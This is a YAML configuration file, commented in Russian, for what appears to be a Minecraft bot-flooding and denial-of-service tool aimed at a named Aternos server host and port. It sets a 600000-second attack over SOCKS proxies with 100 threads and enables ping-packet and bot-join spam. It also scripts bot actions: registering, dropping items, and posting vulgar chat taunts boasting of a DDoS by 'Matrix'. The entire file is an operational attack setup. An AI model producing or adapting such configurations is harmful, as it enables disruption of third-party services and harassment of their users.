host: ujijgibjiktg.aternos.me # IP-адрес сервера
port: 38518 # Порт сервера
proxy: SOCKS # Тип используемых прокси | SOCKS, HTTP, BOTH, NONE
duration: 600000 # Длительность атаки | секунды
threads: 100 # Количество потоков для отправки ботов | Потоки запускаются со скоростью: 20/сек
delay: 1 # Задержка отправки ботов для каждого потока | миллисекунды
nicks: RANDOM # Тип ников | LIST, ALTS или RANDOM
listen: true # Отслеживать состояние бота и иметь возможность осуществлять действия
ping: true # Активировать модуль спама пинг-пакетами
join: true # Активировать модуль спама ботами
chat: false # Выводить чат сервера
info: 0 # Способ вывода информации | 0 или 1
stay: false # Удерживать ботов на сервере
actions: # Выполнять определённые действия на сервере | количество_выполнений;задержка;действие;аргументы
  - 1;600;chat;/register bot12345 bot12345
  - 1;600;chat;/login bot12345
  - 2;1500;move;true
  - 2;1000;chat;! СЕРВЕР ВЫЕБАН BY MATRIX С 2022 ТЕБЯ	
  - 5;1000;use;MAIN_HAND
  - 3;1000;use;OFF_HAND
  - 1;1500;chat;! СЕРВЕР ВЫЕБАН BY MATRIX
  - 1;1500;chat;! tk tk tk tk tk tk tk tk tk tk tk
  - 1;1500;chat;! ддос от матрикса :)
  - 2;1100;swap
  - 1;1200;slot;0
  - 1;1300;drop;
  - 1;1400;slot;1
  - 1;1500;drop;
  - 1;1600;slot;2
  - 1;1700;drop;
  - 1;1800;slot;3
  - 1;1900;drop;
  - 1;1000;slot;4
  - 1;1100;drop;
  - 1;1200;slot;5
  - 1;1300;drop;
  - 1;1400;slot;6
  - 1;1500;drop;
  - 1;1600;slot;7
  - 1;1700;drop;
  - 1;1800;slot;8
  - 1;1900;drop;